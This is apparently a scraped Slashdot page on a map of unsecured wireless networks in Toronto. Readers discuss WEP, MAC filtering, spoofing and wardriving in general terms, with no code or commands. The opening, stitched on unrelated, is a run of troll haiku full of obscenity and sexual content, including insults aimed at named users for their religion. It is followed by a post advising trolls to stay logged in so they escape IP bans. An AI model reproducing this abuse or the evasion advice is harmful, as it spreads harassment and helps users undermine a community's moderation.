CHOAD licking Taco: Malda in the dark - Swallowing choad for profit - He rips his anus
Fuck KATZ Katz is a Jew - michael is a Mormon - Or is it Timothy?
Martini Fuck off That is fucking good. - I nearly spilt martini - On my nice trousers.
Slap my Ham, rub it off, fuck Spank fast wank it hard - Jerk that dick to Pokemon - Party at Taco's
GOAT I just came again - looking at the goat-see man - more kleenex required
Cock BIRD The Dead Penis Bird - Nailed to the member always - Never falling off
BSD Stare into the night - Sun is setting on your sys - BSD *NOT* dead
Michael Michael User Simms - Sifting through all our comments - Censoring bastard
Klerk Trolltalk hard to read - Information desires - Wideness for us all
Cobalt Really tired now - Off to masturbate to sleep - See you at the day
Humorless Moderator Crack smoke wafts through air - Humorless moderator - Why do you hate me?

The last few months I have been doing some research into the trolling phenomenon on slashdot.org. In order to do this as thoroughly as possible, I have written both normal and troll posts, 1st posts, etc., both logged in and anonymously, and I have found these rather shocking results:

More moderator points are being used to mod posts down than up. Furthermore, when modding a post up, every moderator seems to follow previous moderators in their choices, even when it's not a particularly interesting or clever post . There are a LOT more +5 posts than +3 or +4.

Logged in people are modded down faster than anonymous cowards. Presumably these Nazi Moderators think it's more important to burn a user's existing karma, to silence that individual for the future, than to use the moderation system for what it's meant for : identifying "good" and "bad" posts (Notice how nearly all oppressive governments in the past and present do the same thing : marking individuals as bad and untrustworthy because they have conflicting opinions, instead of engaging in a public discussion about these opinions)

Once you have a karma of -4 or -5, your posts have a score of -1 by default. When this is the case, no-one bothers to mod you down anymore. This means a logged in user can keep on trolling as much as he (or she) likes, without risking a ban to post on slashdot. When trolling as an anonymous user, every post starts at score 0, and you will be modded down to -1 ON EVERY POST. When you are modded down a certain number of times in 24 hour, you cannot post anymore from your current IP for a day or so. So, for successful trolling, ALWAYS log in.

A lot of the modded down posts are actually quite clever, funny, etc., and they are only modded down because they are offtopic or an unpopular viewpoint. Now, on a news site like slashdot, where the number of different topics of discussion can be counted on 1 hand, I must say I quite like the distraction these posts offer. But no, when the topic is yet another minor version change of the Linux kernel, they only expect ooohs and aaahs about this great feat of engineering. Look at the moderation done in Open Source centric to see what I mean. Notice any people taking shots at errata present in Open Source software get slaughtered.

It is a well known, proven by poll FACT indicates the vast majority does NOT want the moderation we have here today.

Toronto, The Naked City

[Mika_Lindman]

"Toronto, The Naked City"

Damn, even Slashdot is trying to get people to click links by promising pr0n.

Re:Toronto, The Naked City

[AndroidCat]

They should be careful: If this topic gets any more popular, Slashdot might be Toronto'd.

Re:While Bush Fucks America, Canada Just Looks Bet

[iplayfast]

I think you would find most Torontians and Ontarians, feel differently. As for the rest of Canada's opinion about Toronto, I wouldn't know, and wonder why you would presume to. Do you always put your foot into other peoples mouths?

Re:While Bush Fucks America, Canada Just Looks Bet

Hey cprice, your retarded anti-Toronto bias is showing! Toronto is, actually, one of the largest contributors to Canadian culture in the country. This takes nothing away from other cultural centres like Montreal and Vancouver. Unfortunately for you, irrational hatred of a city just for being successful wont't make this fact go away.

There are offices there

[pischke]

The headquarters for Sears Canada is near Jarvis/Dundas. That's probably the signal they were picking up.

am I ignorant?

[briancnorton]

why are those with open access points ignorant? I have an open access point, and I know EXACTLY what I'm doing.

Is locking down the MAC addresses sufficient?

[emil]

My friend has a Linksys wireless base station and laptop; I gave him some minimal help in setting it up in "infrastructure" (unrestricted?) mode.

Unless there is some sort of "wireless sniffer" which can detect in-use MAC addresses, and also unless the wireless NIC can modify its own MAC, restricting the Linksys base station to a specific set of MACs should be sufficient for small-system security, correct?

It would be even better if I could take a MAC from an old NE2000 10Base2 ethernet card and use that MAC, since anyone trying to guess a MAC would probably use the ranges that have been assigned to the WAN manufacturers. It would be best if this could be done under Windows (in spite of my distaste for MS).

I'm just looking for a "hosts.deny" sort of security; I don't really need encryption (and I understand that wireless encryption has been broken anyway).

Pardon me for any technical errors; I'm clueless about wireless.

Re:Is locking down the MAC addresses sufficient?

[Bishop]

Pardon me for any technical errors; I'm clueless about wireless.

Er. Yes. :-)

Anyone can sniff the valid MACs out of the air and spoof a valid MAC. Useing a old MAC buys you nothing. There are 2^48 MACs so it is unlikely that anyone will randomly try MACs. They will sniff.

To be secure you need WEP. It is not perfect, but if you change your secret atleast once a month you will be far better off then doing nothing. WEP will provide both date security, but also the access controls that you want.

If you really want to be secure you would setup airsnort to try and crack your secret. Once you have half the number of weak packets required to crack, set a new secret. Other options include: use Cisco cards only and Leap; Use Orinoco cards with the new (beta) drivers that don't use weak WEP IVs; Use a proper VPN for all traffic going over the wireless link.

But you in particular have a linksys and don't want to buy new gear. So use WEP and change the key.

Flash?

[b1t+r0t]

I don't see any map. All I get is a couple of pictures and two plug-in boxes. Either the site is slashdotted, or it requires you to run "Naked Flash". I refuse to leave Flash enabled because of all the annoying web ads that now (ab)use it.

You are ignorant

[dnoyeb]

Appearantly the ignorant one is you considering that the encryption is faulty anyway, why bother fooling yourself...

Re:While Bush Fucks America, Canada Just Looks Bet

[iplayfast]

OK all time record since I've been alive. Hows that?

What really bothers me, is that I drive to work and even though the "drive clean" program has been in effect for years, I'm still seeing black exhaust comming out of trucks and cars. Or about Canadian companies like Eco Logic that have working systems to clean up hazardeous waste, yet receive no support from the government, that still incinerates garbage and pcbs. (kirkland lake area residents what out!).

Not to mention the pollutants from the coal burning electrical plants in Ontario. Let's invest a couple of million and put scrubbers on the stacks so that tons of carbon isn't spewed into the air. And oh, yes, Ohio thanks for your contributions to our haze. You're one of the dirtest states there is, but you don't notice because it blows over here.

I've considered moving just for my health's sake, at a great financial loss. Thanks to the government for giving me this option. (Die of lung cancer, or other respertory disease, or move).

Old digs in Toronto dry, but Waterloo high

[c13v3rm0nk3y]

Too bad: According to the map my old places on D'Arcy and Kensington Ave. would have been Wi-Dri.

Fortunately, my new digs are working on going wireless, and legally.

This is the wrong approach

[dazdaz]

I think this is a childish approach and very dangerous because of the legality of doing this, however I do understand their need to highlight this serious issue, this is clearly the wrong way.

In fact I would go so far as to say this is an unauthorised pen-test, in that part of a pen-test is in finding hosts/networks in the same way the physical location has been found, but not only found, also published.

I dont know where liability and juristiction come into play here, i'm surprised these guys/gals are prepared to go this extreme and risk finding out.

Surely a CNN interview would do their careers good and promote the issue far wider than a website could?

APs everywhere in Auckland. Advice required.

on the RoamAD network.
Their network is here:

RoamAD network area

I can't get on to it though. Any pointers? Tips? from the pros. How do you do it?

You decide

[dazdaz]

Is this a very nieve and good samaritan concerned Internet users united thing or a business strategy in order to obtain security work and publicity.

If it's the first, then they should take legal advice.

If it's the second then is this what the Internet has come to? [I'm talking about publicity of themselves and assuming that not all of those networks will be Internet connected].

How many false positives are on this??

[chinard]

I live in toronto, and i must say that looking at this map is quite shocking. Then i sat down and really started looking at it, and i made an interesting observation. Most of the really HIGH concentrations of red markers are in RETAIL districts where there are alot of stores with POS systems, shoplifting prevention, motion detectors and store security. Most of these stores probably don't actualy have wireless networks, but have plenty of other things that might generate an rf signal that could be mistaken as a wireless network.

Uhhh, kinda like Portland?

http://www.pdxwireless.org ?

Aww, darn it!

[AndroidCat]

I was going to by a wireless card and a Pringles can and get rid of my DSL. And now someone had to go spill the beans!

What's really retarded is...

[inteller]

.....when a bunch of war drivers get together and start calling themselves a consulting group. You can't even take their name seriously. I seriously doubt they can offer any serious services besides telling me what the latest news is on slashdot and who has the highest score in Warcraft 3. I wish I could have reputable reporting that doesn't give fly by night groups attention.

False sense of security

[shepd]

Sorry, I can't find the link, but with the right equipment (all consumer available) you can easy link up to any wireless network up to 40 km away.

With your sheilding they might have to be just 1 or 2 km away, which still leaves them completely hidden, and your network totally open.

Toronto, The Naked City

[Hott+of+the+World]

There's one thing wrong with that title. Can anyone spot it?

Mostly residential and small business

[Jeff+Hornby]

I live in Toronto, and looking at the map I'd say that at least half of the unsecured networks are either very small businesses (no more than 5 or 6 employees), residential or one of the universities. The clusters along Yonge, Richmond, Queen, King, etc. are mostly stores with some residential or commercial space above them or condo towers.

Look around King and Bay where the banks are and you'll see that there are hardly any networks at all.

Still a problem, but it looks like the big boys (read the ones we don't want hacked) are doing OK, it's the little guys that are screwing up.

False conclusions

[Jetson]

The map and site determine "secure" and "insecure" solely by whether or not the node uses WEP. That's wrong for two reasons:

1) WEP all by itself is simply not secure.

2) If you are using another form of encryption (such as IPSEC) then WEP would slow down your network without any security benefits because the data stream would be encrypted twice.

By way of example, I run a Linux server and Linux laptop. The server has a second ethernet interface that is dedicated to the wireless device. Both the laptop and the server are configured to drop all packets arriving or departing via the wireless device except for IPSEC (esp protocol and udp port 500). Forwarding in the server is only permitted from the ipsec (post-decode) interface. If someone wants to use my broadband connection then they have to break IPSEC.

And yet these guys would flag me on their map as an insecure station because I don't use WEP. Maybe they should re-make the map based on whether or not their roaming node can do more than just handshake. Like, try connecting to Slashdot or something....

open source method to roam between these networks?

[robdeadtech]

Are there any open source project to enable roaming "seamlessly" between wireless networks? Greenpacked(http://www.greenpacket.com/) is working on this but AFAIK it isn't open source...

this is great!

i am both for improving system security AND abusing the ignorant:)

Re:open source method to roam between these networ

Check out RoamAD:

http://roamad.com/roam_home_demo.html

They seem to have solved all that.

24 Sussex

I bet here in Ottawa, you'd see a nice red pushpin near 24 Sussex. The RCMP can't grasp the concept of physical security, let alone network security.

If you observe the traffic, you will notice a barrage of UDP packets. Yup! It's JC out back playing his favourite game.. Chrétien-Strike.

There are two teams: MPs and Protestors.

If you play JC, you have your choice of pepper spray or your bare hands.

If you're playing Sheila Copps.. well, trust me.. you won't need a weapon.

Really?

I would have thought that a lot of "naked networking" went on there.